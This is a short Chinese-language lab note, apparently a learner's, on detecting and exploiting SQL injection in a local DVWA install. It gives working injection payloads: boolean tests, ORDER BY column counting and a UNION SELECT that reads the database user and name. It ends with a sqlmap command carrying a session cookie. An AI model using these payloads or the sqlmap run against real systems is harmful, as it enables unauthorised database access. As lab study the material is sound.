怎么判断sql注入漏洞呢?
后台执行的SQL语句为
SELECT first_name, last_name FROM users WHERE user_id = '$id';
($id:用户输入的内容)
用户输入的数据为:
1' and 1=1#
这时SQL语句发生变化,在原有查询完成后会判断1=1(这明显是对的),如果判断正确才会有输出
[#作用是注释(移除)后续SQL语句]
用户输入的数据为:
1' and 1=2#
这时SQL语句发生变化,在原有查询完成后会判断1=1(这明显是错的),如果判断正确才会有输出
两次尝试,1=1 正常输出,1=2错误输出,证明SQL语句生效,存在SQL注入漏洞
怎么利用sql注入漏洞呢?
1.判断列/字段数 order by[column_num]
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1#';
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 2#';
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 3#';
用户输入的数据为1' order by 3#时网页报错,证明该数据库表有2列/字段
2.联合查询其他信息 union select [sql1][sql2]
SELECT first_name, last_name FROM users WHERE user_id = '1' union select user(),database()#';
用户输入SQL语句,执行了MySQL内置函数user()和database()
user():返回当前数据库连接用户
database():返回当前数据库名称
**3.联合查询表 **
呜呜呜·,做不来了,还是直接用sqlmap工具吧
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=97d0e83e1deb659f9310dce085110bac#" --cookie="security=impossible; PHPSESSID=rcl7hiv2mutm5qmr2ck5743ejj"